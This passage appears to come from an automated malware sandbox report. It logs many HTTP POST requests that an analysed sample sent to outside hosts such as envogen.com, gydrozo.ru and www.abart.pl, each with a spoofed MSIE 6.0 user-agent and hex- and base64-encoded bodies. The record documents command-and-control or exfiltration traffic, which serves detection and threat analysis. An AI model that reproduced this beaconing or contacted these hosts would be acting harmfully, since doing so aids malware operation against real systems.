5a 6d 52 65 70 71 6d 4f 65 58 78 6e 64 4f 6d 53 42 7a 7a 2b 39 50 4b 50 54 47 32 52 56 51 46 6c 5a 63 57 55 6a 63 6b 6a 43 41 2f 41 71 61 45 6e 4f 76 6e 43 51 7a 68 6a 6c 58 4b 53 72 56 47 2b 48 58 45 46 4b 42 49 63 6a 47 6a 6a 64 32 36 75 4c 71 54 58 71 59 61 4b 2b 35 39 64 6e 31 33 70 55 68 6a 2b 71 71 36 71 68 73 64 71 5a 70 68 61 79 41 36 6b 59 31 46 31 4f 54 50 39 57 57 75 4a 67 6f 33 49 45 4b 4a 77 76 73 33 33 61 38 61 70 73 65 32 45 35 72 7a 6a 79 46 36 45 46 74 62 65 46 46 62 64 5a 4b 76 56 30 58 6f 65 43 44 62 2b 2b 56 6d 67 65 34 36 6c 4a 4c 4c 2f 69 31 35 32 56 62 49 62 76 44 63 54 77 51 66 73 69 61 53 36 66 79 6d 38 52 77 73 66 34 62 39 39 46 4b 34 42 62 71 77 75 59 34 53 52 54 45 2f 33 6e 32 67 4d 5a 59 46 68 36 41 32 67 64 38 59 61 37 73 6f 6e 35 52 39 42 2b 4d 51 58 50 70 6d 6b 45 6a 59 43 72 66 72 34 77 44 66 66 4a 6c 37 72 52 69 33 69 58 30 6d 72 50 4c 62 74 37 4b 53 76 4a 72 55 50 6b 31 49 72 53 70 Data Ascii: JEt9ZjtpGHKsuF980s1cCCTXJrFB7PGEn46kIXXdsBJm24iKAUwzrlxhSM0KGhE9348Pnr1ArrJrCgfOm4bSmq5ECrrO+koqM7Y0LOYj+tVCCFH4ky/PlCP3clIo4L3l5GizFKHYjMgSGcIT74tkLOalIt5qs/oyTzUEly1qXqf+Yuf0l4FKjoJg9hhRO380zKJvifcyi4gAWEBrMwHq6Zz4Cz3LNzcCDMM2TAZBYs7QdyM59tZ8S7B674pYOaZmRepqmOeXxndOmSBzz+9PKPTG2RVQFlZcWUjckjCA/AqaEnOvnCQzhjlXKSrVG+HXEFKBIcjGjjd26uLqTXqYaK+59dn13pUhj+qq6qhsdqZphayA6kY1F1OTP9WWuJgo3IEKJwvs33a8apse2E5rzjyF6EFtbeFFbdZKvV0XoeCDb++Vmge46lJLL/i152VbIbvDcTwQfsiaS6fym8Rwsf4b99FK4BbqwuY4SRTE/3n2gMZYFh6A2gd8Ya7son5R9B+MQXPpmkEjYCrfr4wDffJl7rRi3iX0mrPLbt7KSvJrUPk1IrSp
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1970User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: envogen.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 4d 5a 66 51 62 7a 43 59 53 6e 49 4a 4f 43 39 76 51 38 32 4c 6e 2b 50 69 76 79 50 59 41 74 6c 32 5a 48 49 38 56 5a 68 57 35 48 34 52 6f 39 6e 38 74 4a 34 78 73 4e 2b 69 57 73 54 4e 39 65 69 34 6f 66 74 4c 77 35 49 67 76 52 72 67 73 67 42 57 66 78 52 79 65 75 69 76 34 77 56 31 45 65 4f 30 69 34 7a 68 37 75 67 76 71 6c 56 68 48 2f 2f 6c 4d 48 72 75 39 37 4b 73 55 4e 4a 35 72 34 2f 4c 35 62 69 56 4f 52 46 44 59 76 72 6b 69 50 52 4f 43 31 35 53 6f 32 4d 71 4b 33 38 55 32 59 47 70 41 79 6e 35 5a 64 6c 47 49 34 66 31 42 6f 47 70 48 68 4d 6a 41 42 4e 79 68 30 48 54 62 6c 72 4f 76 6d 43 77 70 59 7a 65 34 64 7a 6f 46 34 78 42 41 69 42 74 77 74 6f 73 51 54 61 4d 4b 47 62 50 34 5a 63 79 5a 49 74 36 39 6e 46 57 4b 79 70 64 59 6b 33 5a 72 35 64 2f 75 56 51 6e 69 6c 56 64 6f 76 70 59 55 34 36 34 71 6e 49 44 50 43 38 30 30 4c 44 32 52 7a 6b 39 78 4a 37 30 30 2b 50 45 36 67 52 34 6c 50 31 37 2f 62 53 4d 4e 63 71 54 69 36 4d 7a 58 47 42 79 6d 70 43 46 57 4a 31 44 54 38 36 35 4a 48 35 76 70 32 6f 61 58 35 41 4e 2f 51 75 6a 63 51 30 69 70 6c 31 4e 57 73 49 69 57 6b 2b 50 67 4f 68 4b 79 46 7a 42 54 2f 30 49 74 6e 56 6c 34 42 43 2f 32 78 52 37 69 68 46 46 71 48 67 4c 37 6c 45 6e 2f 62 2b 43 66 49 71 50 35 31 4e 55 5a 49 45 46 56 44 32 35 51 47 61 6f 31 6b 75 35 61 33 64 6a 4c 5a 54 63 34 71 4e 47 43 32 66 45 4a 6f 51 58 76 68 34 45 68 77 63 61 38 65 62 31 6f 77 79 57 65 41 41 43 74 49 78 46 36 6f 69 6d 32 2b 45 71 79 2f 6d 6b 4c 77 62 36 6f 39 6f 6e 48 57 55 4d 66 32 61 7a 58 59 69 79 64 57 37 36 62 65 54 78 30 6b 32 2f 44 42 73 51 43 38 47 37 70 44 6d 76 2b 6b 4b 57 78 75 4c 73 53 42 68 35 68 53 4d 63 79 5a 7a 4b 59 2f 39 59 31 35 61 5a 4a 58 34 67 52 75 6d 67 65 56 76 59 56 55 4e 66 33 70 78 53 32 39 78 74 31 4d 6c 59 74 33 46 56 57 77 3d 3d Data Ascii: MZfQbzCYSnIJOC9vQ82Ln+PivyPYAtl2ZHI8VZhW5H4Ro9n8tJ4xsN+iWsTN9ei4oftLw5IgvRrgsgBWfxRyeuiv4wV1EeO0i4zh7ugvqlVhH//lMHru97KsUNJ5r4/L5biVORFDYvrkiPROC15So2MqK38U2YGpAyn5ZdlGI4f1BoGpHhMjABNyh0HTblrOvmCwpYze4dzoF4xBAiBtwtosQTaMKGbP4ZcyZIt69nFWKypdYk3Zr5d/uVQnilVdovpYU464qnIDPC800LD2Rzk9xJ700+PE6gR4lP17/bSMNcqTi6MzXGBympCFWJ1DT865JH5vp2oaX5AN/QujcQ0ipl1NWsIiWk+PgOhKyFzBT/0ItnVl4BC/2xR7ihFFqHgL7lEn/b+CfIqP51NUZIEFVD25QGao1ku5a3djLZTc4qNGC2fEJoQXvh4Ehwca8eb1owyWeAACtIxF6oim2+Eqy/mkLwb6o9onHWUMf2azXYiydW76beTx0k2/DBsQC8G7pDmv+kKWxuLsSBh5hSMcyZzKY/9Y15aZJX4gRumgeVvYVUNf3pxS29xt1MlYt3FVWw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 166User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: e-kami.netConnection: Keep-AliveCache-Control: no-cacheData Raw: 48 55 64 6f 78 37 48 51 61 6a 75 34 44 4e 57 67 72 31 42 4b 55 65 6f 79 37 48 51 61 6b 75 34 45 4f 58 68 72 31 42 4b 55 64 6f 7a 39 4a 53 63 6c 77 35 46 50 59 69 73 32 42 4c 56 65 70 79 38 48 52 62 6c 77 35 46 50 59 69 73 32 43 4c 56 65 70 79 38 49 52 62 6b 76 34 45 50 59 69 74 32 43 4c 57 66 71 30 39 4a 53 63 6d 77 36 46 50 5a 69 74 32 43 4c 56 66 70 7a 39 49 53 62 6c 76 35 46 4f 59 69 74 32 43 4c 56 65 70 7a 38 49 52 62 6c 76 35 45 4f 58 68 73 31 42 4b 55 65 6f 79 37 48 51 61 6b 75 34 44 4e Data Ascii: HUdox7HQaju4DNWgr1BKUeoy7HQaku4EOXhr1BKUdoz9JSclw5FPYis2BLVepy8HRblw5FPYis2CLVepy8IRbkv4EPYit2CLWfq09JScmw6FPZit2CLVfpz9ISblv5FOYit2CLVepz8IRblv5EOXhs1BKUeoy7HQaku4DN
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 71 72 36 67 56 51 76 64 46 33 4c 2b 49 69 55 6c 59 6f 37 4b 48 33 51 4c 36 59 4e 52 5a 48 61 31 62 39 63 6c 73 43 37 4a 42 66 52 61 74 72 61 65 52 72 36 55 4d 54 2b 67 56 6d 65 41 59 35 62 42 6f 77 50 7a 58 79 42 69 49 6b 65 30 4d 48 5a 6a 5a 55 73 57 6c 4b 4d 73 4f 42 56 58 33 64 31 4a 6d 6e 41 42 70 67 49 30 61 64 57 32 32 65 43 62 67 4d 67 50 75 50 58 69 67 78 6d 46 46 44 57 56 79 46 41 2b 76 4a 74 4e 33 53 4a 73 73 2b 35 4d 41 45 36 74 2f 64 36 51 37 72 2f 4c 47 50 5a 42 76 68 66 6a 65 6c 6a 44 36 78 76 50 55 47 62 48 72 49 6a 7a 4c 4f 67 39 34 64 4d 66 67 30 65 68 39 67 51 58 48 42 76 58 33 77 2f 74 30 4c 52 43 38 57 57 70 44 57 72 4e 51 53 78 53 78 65 4f 49 67 52 62 55 71 6a 62 65 31 6f 45 42 45 54 4d 2b 6d 68 42 34 4b 69 58 4c 79 53 67 2b 41 7a 67 77 63 34 36 4c 72 64 33 47 5a 6c 37 4e 49 74 31 2f 63 4f 54 48 30 6a 46 50 43 70 6d 49 52 70 62 56 78 74 2f 6e 65 55 66 78 43 4c 65 6d 35 4e 73 6f 70 33 31 53 7a 4a 65 68 41 45 48 6b 34 4f 53 44 76 6e 62 4d 6d 66 32 41 78 30 58 7a 59 57 42 58 75 32 49 67 79 53 6f 74 54 41 67 35 54 2f 70 56 4f 43 59 79 75 45 6a 75 4d 56 4f 4f 45 37 31 63 57 41 41 41 58 62 6d 55 55 6a 35 56 64 74 38 46 73 4d 50 7a 76 53 73 6e 52 46 6e 4f 78 56 34 5a 33 63 4f 57 67 6e 78 31 34 57 49 4c 73 49 2f 77 77 32 45 37 45 49 66 7a 66 63 73 33 6d 68 41 7a 65 44 4a 4a 41 67 2b 59 65 48 47 55 53 6c 6a 64 54 35 53 71 6d 30 48 5a 56 6f 50 77 6d 31 34 59 66 38 63 72 58 31 41 2f 37 45 46 37 48 63 55 41 39 7a 34 35 64 4a 38 36 4c 67 42 6b 46 6b 31 6b 6f 55 43 2f 76 63 47 43 50 31 55 53 65 73 4e 57 77 6c 52 35 33 37 4b 53 35 6e 2f 38 2b 57 68 32 68 6f 34 45 45 45 69 4c 2f 4e 37 72 79 45 2b 43 55 73 6a 2b 73 6c 2b 79 4d 59 35 50 67 49 49 63 Data Ascii: qr6gVQvdF3L+IiUlYo7KH3QL6YNRZHa1b9clsC7JBfRatraeRr6UMT+gVmeAY5bBowPzXyBiIke0MHZjZUsWlKMsOBVX3d1JmnABpgI0adW22eCbgMgPuPXigxmFFDWVyFA+vJtN3SJss+5MAE6t/d6Q7r/LGPZBvhfjeljD6xvPUGbHrIjzLOg94dMfg0eh9gQXHBvX3w/t0LRC8WWpDWrNQSxSxeOIgRbUqjbe1oEBETM+mhB4KiXLySg+Azgwc46Lrd3GZl7NIt1/cOTH0jFPCpmIRpbVxt/neUfxCLem5Nsop31SzJehAEHk4OSDvnbMmf2Ax0XzYWBXu2IgySotTAg5T/pVOCYyuEjuMVOOE71cWAAAXbmUUj5Vdt8FsMPzvSsnRFnOxV4Z3cOWgnx14WILsI/ww2E7EIfzfcs3mhAzeDJJAg+YeHGUSljdT5Sqm0HZVoPwm14Yf8crX1A/7EF7HcUA9z45dJ86LgBkFk1koUC/vcGCP1USesNWwlR537KS5n/8+Wh2ho4EEEiL/N7ryE+CUsj+sl+yMY5PgIIc
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 524User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 58 33 36 73 2b 4e 61 6e 34 43 63 53 32 37 2b 2b 73 62 32 63 4b 58 6e 66 76 30 64 32 61 69 50 30 61 74 6e 51 30 74 49 64 4e 41 58 38 38 72 59 76 41 55 47 4f 7a 42 67 66 4f 79 44 43 70 67 61 34 77 64 4c 55 49 34 78 62 41 52 4b 71 41 32 4b 44 4c 62 58 37 61 6e 7a 52 74 49 70 43 73 34 57 64 78 6a 4a 54 5a 48 32 58 41 32 39 35 6c 35 66 61 4c 64 44 6f 36 68 58 31 52 37 44 38 47 34 66 7a 30 55 4f 32 65 2b 39 31 62 49 37 57 61 55 77 77 61 4d 30 6a 58 70 41 47 4d 78 66 50 4a 55 62 59 79 36 4d 38 34 71 65 77 6b 59 6f 6c 44 4f 43 4c 39 54 42 49 6c 57 4d 4a 30 6f 6f 4f 65 79 6b 6a 42 4f 51 57 38 31 32 55 6d 42 48 77 72 4b 67 62 72 43 32 50 6e 68 2f 67 2f 35 69 42 52 48 5a 74 48 77 45 47 4f 53 44 50 37 6e 54 61 6a 50 76 66 61 46 71 74 6e 64 4a 65 67 37 67 32 4b 54 73 47 59 65 36 6d 39 50 6f 4c 79 61 35 58 2f 47 62 53 67 51 67 4b 36 69 47 47 6c 6d 77 65 54 43 68 58 43 4e 61 64 36 39 55 49 4a 65 31 45 68 32 54 51 6a 6c 46 4d 44 30 71 48 34 69 75 33 41 62 35 69 48 35 77 53 33 7a 4f 74 6e 4f 49 56 6d 66 72 35 33 46 38 32 43 74 6c 78 49 68 49 4d 5a 54 69 69 72 6a 44 54 4b 65 67 38 48 33 32 54 75 56 51 2f 72 55 57 6b 53 33 58 64 71 78 43 5a 48 35 35 78 4b 39 39 37 36 75 6a 44 6e 59 4e 64 32 43 4d 6e 72 79 33 61 32 43 33 36 79 44 79 6a 47 6b 69 36 59 4e 46 48 2f 58 42 55 62 50 63 59 69 6e 4c 35 66 53 67 49 76 58 71 79 52 4d 33 57 5a 51 4c 63 70 35 4a 72 66 46 4e 42 4f 77 59 55 6c 43 53 4d 65 63 73 6f 52 51 4c 63 4c 70 75 53 50 78 73 63 4a 47 5a 44 43 37 4d 6a 41 49 68 57 33 49 69 55 6d 75 73 59 4b 55 39 50 47 65 7a 79 61 4a 56 65 55 55 59 45 6e 5a 49 48 5a 65 2b 6c Data Ascii: X36s+Nan4CcS27++sb2cKXnfv0d2aiP0atnQ0tIdNAX88rYvAUGOzBgfOyDCpga4wdLUI4xbARKqA2KDLbX7anzRtIpCs4WdxjJTZH2XA295l5faLdDo6hX1R7D8G4fz0UO2e+91bI7WaUwwaM0jXpAGMxfPJUbYy6M84qewkYolDOCL9TBIlWMJ0ooOeykjBOQW812UmBHwrKgbrC2Pnh/g/5iBRHZtHwEGOSDP7nTajPvfaFqtndJeg7g2KTsGYe6m9PoLya5X/GbSgQgK6iGGlmweTChXCNad69UIJe1Eh2TQjlFMD0qH4iu3Ab5iH5wS3zOtnOIVmfr53F82CtlxIhIMZTiirjDTKeg8H32TuVQ/rUWkS3XdqxCZH55xK9976ujDnYNd2CMnry3a2C36yDyjGki6YNFH/XBUbPcYinL5fSgIvXqyRM3WZQLcp5JrfFNBOwYUlCSMecsoRQLcLpuSPxscJGZDC7MjAIhW3IiUmusYKU9PGezyaJVeUUYEnZIHZe+l
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 2025User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: sidepath.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 944User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: enguita.netConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 357User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: gydrozo.ruConnection: Keep-AliveCache-Control: no-cacheData Raw: 4c 56 64 6c 75 32 45 4d 54 62 6a 73 7a 37 46 4e 55 63 6b 74 30 38 47 4e 56 64 6b 75 31 39 48 4f 57 65 6c 75 32 41 48 50 58 65 6d 76 33 41 49 51 59 66 6f 77 34 45 4d 55 63 6a 73 30 37 46 4e 56 64 6c 74 31 39 48 4f 57 65 6c 75 32 39 48 50 57 65 6d 76 32 41 49 50 58 66 6d 76 33 42 49 51 59 66 6f 77 33 43 4a 52 5a 68 70 78 35 43 4b 53 61 68 71 79 35 44 4c 53 61 69 71 79 36 44 4d 54 62 6a 73 7a 37 46 4e 55 63 6b 73 30 38 47 4f 56 64 6d 76 32 41 49 50 58 66 6d 76 33 42 49 51 59 66 6f 77 33 42 4a 52 5a 68 72 7a 37 45 4d 55 62 6a 73 30 37 46 4e 56 64 6c 75 31 39 48 4f 57 65 6c 77 35 43 4b 53 5a 68 71 78 35 44 4d 54 62 6a 73 7a 37 46 4d 56 64 6c 74 31 39 48 4f 59 67 70 77 34 43 4a 53 5a 68 71 78 35 44 4b 53 61 68 71 79 35 44 4c 54 61 69 72 79 36 45 4c 54 62 69 72 7a 37 46 4e 55 63 6b 73 30 38 47 4e 56 64 6b 74 31 38 47 4f 57 65 6c 75 32 39 48 50 57 65 6d 75 32 41 48 50 58 66 6f 76 33 42 4a 51 59 67 6f 77 34 42 4a 52 5a 67 70 78 34 43 4b 52 5a 68 70 78 35 44 4c 53 61 69 71 79 36 45 4c 54 62 69 72 7a 37 45 4d 55 62 6a 73 7a 37 46 4e 55 63 6b 74 30 38 47 4e 56 64 6b Data Ascii: LVdlu2EMTbjsz7FNUckt08GNVdku19HOWelu2AHPXemv3AIQYfow4EMUcjs07FNVdlt19HOWelu29HPWemv2AIPXfmv3BIQYfow3CJRZhpx5CKSahqy5DLSaiqy6DMTbjsz7FNUcks08GOVdmv2AIPXfmv3BIQYfow3BJRZhrz7EMUbjs07FNVdlu19HOWelw5CKSZhqx5DMTbjsz7FMVdlt19HOYgpw4CJSZhqx5DKSahqy5DLTairy6ELTbirz7FNUcks08GNVdkt18GOWelu29HPWemu2AHPXfov3BJQYgow4BJRZgpx4CKRZhpx5DLSaiqy6ELTbirz7EMUbjsz7FNUckt08GNVdk
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 33 53 46 61 4b 6b 4f 32 4e 33 4b 59 63 46 67 71 53 75 5a 73 43 47 79 4e 50 35 66 70 77 58 4d 2f 4a 36 43 70 49 69 45 42 6f 78 64 70 6d 2f 30 35 6c 54 51 48 51 43 41 66 68 48 6a 4a 73 73 63 69 58 64 46 37 2f 36 4e 34 37 54 74 6f 61 2f 2f 6f 77 68 66 38 5a 77 31 58 50 62 46 47 39 55 75 53 41 71 51 61 4c 58 41 4f 69 49 74 4c 43 6c 52 62 61 65 33 79 38 51 33 33 41 79 59 72 30 34 71 46 6b 6e 32 34 4b 4f 4a 65 72 74 61 44 6b 65 68 36 63 55 64 65 71 48 30 53 37 2b 6f 35 4b 4f 6e 32 33 50 4a 51 50 77 61 59 65 33 31 66 72 54 69 6b 6d 71 49 61 62 6f 66 50 36 68 41 73 43 59 43 51 76 49 43 71 41 2b 43 4c 34 51 42 7a 4a 45 61 6b 71 43 49 61 6f 6d 34 62 50 62 73 56 74 6a 34 6a 52 4f 33 35 78 70 5a 6a 51 37 52 43 6c 4f 48 34 6f 45 76 44 6f 31 65 52 31 50 49 39 63 50 45 75 35 72 6b 2f 61 37 41 78 64 51 6d 49 33 67 46 6f 42 6b 6d 58 77 69 43 41 30 33 52 6b 38 49 74 59 54 46 74 72 5a 6d 2b 48 39 4c 61 4c 2b 56 6f 4f 50 48 76 79 69 4a 79 54 4a 4a 52 69 6c 54 5a 70 67 50 57 62 4f 51 71 56 37 65 57 30 68 62 41 38 72 4b 73 53 43 4b 59 58 51 78 59 67 39 52 49 42 74 70 31 64 6b 5a 73 7a 54 4f 7a 4e 33 77 6f 49 68 30 48 67 61 4d 34 4e 55 41 55 69 39 37 4c 48 31 6b 48 6d 36 70 44 52 31 4c 62 6d 70 52 6e 52 44 32 49 51 57 35 4b 6f 4a 79 4b 75 49 4f 50 5a 44 34 6a 73 75 32 73 68 7a 62 38 67 6b 68 63 69 50 50 78 7a 6a 47 4b 79 51 4d 48 2b 65 2f 44 64 64 6d 4e 48 72 75 4e 51 53 79 36 7a 48 52 75 61 75 77 6d 57 54 4a 59 65 68 4d 41 56 64 68 57 5a 48 31 63 79 56 48 54 35 4c 2f 76 45 6c 52 31 6b 66 44 41 72 65 69 6a 39 47 37 73 6e 79 56 30 4f 58 74 54 33 62 73 41 55 44 43 31 6b 59 71 56 53 67 43 48 43 34 33 39 52 7a 36 5a 76 44 4d 38 70 49 5a 65 66 61 70 33 72 61 53 6c 52 38 2f 52 5a 44 77 3d 3d Data Ascii: 3SFaKkO2N3KYcFgqSuZsCGyNP5fpwXM/J6CpIiEBoxdpm/05lTQHQCAfhHjJssciXdF7/6N47Ttoa//owhf8Zw1XPbFG9UuSAqQaLXAOiItLClRbae3y8Q33AyYr04qFkn24KOJertaDkeh6cUdeqH0S7+o5KOn23PJQPwaYe31frTikmqIabofP6hAsCYCQvICqA+CL4QBzJEakqCIaom4bPbsVtj4jRO35xpZjQ7RClOH4oEvDo1eR1PI9cPEu5rk/a7AxdQmI3gFoBkmXwiCA03Rk8ItYTFtrZm+H9LaL+VoOPHvyiJyTJJRilTZpgPWbOQqV7eW0hbA8rKsSCKYXQxYg9RIBtp1dkZszTOzN3woIh0HgaM4NUAUi97LH1kHm6pDR1LbmpRnRD2IQW5KoJyKuIOPZD4jsu2shzb8gkhciPPxzjGKyQMH+e/DddmNHruNQSy6zHRuauwmWTJYehMAVdhWZH1cyVHT5L/vElR1kfDAreij9G7snyV0OXtT3bsAUDC1kYqVSgCHC439Rz6ZvDM8pIZefap3raSlR8/RZDw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 75 77 7a 49 67 63 4f 2b 64 48 49 2f 5a 36 42 48 79 6c 56 70 4d 65 77 70 6d 41 70 70 39 4d 36 78 70 2f 42 6d 33 4c 71 30 30 63 56 47 47 53 4f 62 71 46 36 39 54 6a 43 4b 6a 64 44 55 49 57 4a 73 32 6d 46 71 35 63 50 43 4a 6c 55 62 55 4d 35 4a 32 37 78 42 35 56 30 45 78 58 66 4d 59 59 32 43 52 54 35 39 74 36 39 48 6d 62 4b 6d 78 71 53 38 68 74 4b 30 66 72 75 51 6b 50 42 70 72 2f 47 59 69 48 43 64 6d 64 4f 6b 79 50 54 72 72 51 6e 76 47 5a 63 59 38 71 6c 58 66 4d 6c 61 65 64 41 75 48 5a 52 64 41 63 48 7a 55 56 30 6a 61 45 45 73 5a 34 6b 65 79 65 77 51 72 51 57 38 57 72 4c 55 76 79 65 43 30 36 2f 4f 46 6b 30 34 65 6e 33 54 77 43 34 41 53 7a 4e 69 79 6a 4a 6d 59 56 78 35 31 62 4e 63 77 2b 50 35 57 75 2f 67 6b 74 71 6b 59 41 68 31 6b 48 54 4c 51 2b 6b 62 62 56 6a 56 50 56 4a 56 73 46 34 4f 31 67 50 49 4e 31 6c 68 61 41 6d 37 5a 36 72 43 71 76 56 4f 70 58 34 76 30 31 4a 6c 46 69 6e 59 4d 49 55 48 77 35 42 6b 39 6e 38 52 38 55 37 64 6d 68 2f 6f 6b 46 39 68 66 6e 54 6f 77 36 67 35 42 75 73 5a 68 70 54 48 4a 52 37 30 78 57 36 7a 2f 75 42 45 66 42 72 69 78 48 78 6c 34 47 51 4d 67 6e 4d 4f 79 43 41 4d 46 6e 70 7a 69 37 75 2b 70 74 64 73 2b 39 64 2f 79 65 4c 54 7a 42 7a 31 41 48 42 62 38 72 5a 54 61 71 75 76 75 52 6e 66 55 34 6b 4d 74 37 72 56 66 79 33 53 61 4c 55 55 33 4b 45 50 77 71 6e 62 79 76 43 35 41 54 57 6e 41 41 68 53 64 74 44 58 77 59 44 4b 51 78 4f 6f 46 41 69 56 68 57 4d 42 62 32 38 45 4b 6e 4e 50 68 4d 56 4a 67 34 2f 33 6d 4b 6e 78 7a 69 41 51 52 66 74 6d 67 53 43 59 34 32 4d 4f 74 51 78 77 30 74 39 47 66 69 76 47 69 52 6c 61 36 6d 4c 72 47 4c 66 77 39 56 30 70 58 62 54 4b 46 32 52 78 38 6f 4b 46 6f 41 56 69 74 72 4e 38 42 32 4b 61 6f 73 5a 50 57 41 74 42 42 69 61 62 38 49 7a 76 67 47 55 41 Data Ascii: uwzIgcO+dHI/Z6BHylVpMewpmApp9M6xp/Bm3Lq00cVGGSObqF69TjCKjdDUIWJs2mFq5cPCJlUbUM5J27xB5V0ExXfMYY2CRT59t69HmbKmxqS8htK0fruQkPBpr/GYiHCdmdOkyPTrrQnvGZcY8qlXfMlaedAuHZRdAcHzUV0jaEEsZ4keyewQrQW8WrLUvyeC06/OFk04en3TwC4ASzNiyjJmYVx51bNcw+P5Wu/gktqkYAh1kHTLQ+kbbVjVPVJVsF4O1gPIN1lhaAm7Z6rCqvVOpX4v01JlFinYMIUHw5Bk9n8R8U7dmh/okF9hfnTow6g5BusZhpTHJR70xW6z/uBEfBrixHxl4GQMgnMOyCAMFnpzi7u+ptds+9d/yeLTzBz1AHBb8rZTaquvuRnfU4kMt7rVfy3SaLUU3KEPwqnbyvC5ATWnAAhSdtDXwYDKQxOoFAiVhWMBb28EKnNPhMVJg4/3mKnxziAQRftmgSCY42MOtQxw0t9GfivGiRla6mLrGLfw9V0pXbTKF2Rx8oKFoAVitrN8B2KaosZPWAtBBiab8IzvgGUA
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1881User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: anduran.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1801User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: t-trust.jpConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1828User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: umcor.amConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1737User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: jsaps.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1687User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: 78san.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 63 6d 73 47 51 36 2f 6d 72 48 4b 43 43 63 6c 46 7a 6d 51 33 65 72 68 55 6f 30 33 46 65 46 6d 36 55 30 48 47 30 71 6f 54 6f 44 4e 49 55 45 43 64 64 46 69 37 54 6c 50 74 6d 33 33 54 67 46 42 53 56 55 52 49 50 54 43 2f 37 6b 55 61 35 74 4c 71 73 4d 71 72 64 4b 48 59 56 63 4c 4a 4b 70 75 76 54 50 42 77 65 61 54 55 6e 64 54 51 63 5a 4c 56 58 41 36 73 71 65 36 59 67 6f 78 54 49 59 4e 43 41 68 37 6b 53 76 66 7a 5a 4e 78 6c 47 59 65 6c 33 37 38 4c 73 6c 58 64 42 57 6d 67 65 6d 4a 70 2f 4d 39 45 51 6f 37 4f 47 63 54 63 69 66 41 6a 41 55 38 73 48 65 44 50 58 65 78 2b 6e 4f 49 51 74 33 64 58 57 66 38 45 5a 73 79 59 6f 4e 71 61 58 46 34 6d 51 66 73 6f 36 71 72 6c 58 76 72 75 6d 76 6e 65 75 41 37 71 71 47 7a 4e 43 4f 53 41 6b 4c 71 39 78 49 41 43 6a 65 6c 42 7a 4a 32 41 44 78 2b 7a 4b 51 4f 38 4e 33 7a 43 6b 4e 4a 4e 47 34 50 44 64 4a 4b 5a 33 48 45 31 55 68 64 35 32 33 41 57 42 37 36 38 51 56 44 69 4d 4f 57 55 65 30 42 4f 65 64 77 72 6f 6a 42 79 30 39 35 75 59 33 43 41 63 69 37 5a 43 45 4f 48 59 5a 65 48 64 30 4d 7a 73 78 62 6c 49 30 59 68 4d 33 4a 43 35 6f 43 57 78 65 58 2f 52 49 31 50 39 61 42 4c 6d 54 35 6d 44 31 53 56 4e 4c 73 48 41 58 39 56 55 57 48 72 74 48 32 4b 4d 2b 58 30 57 66 4a 55 69 71 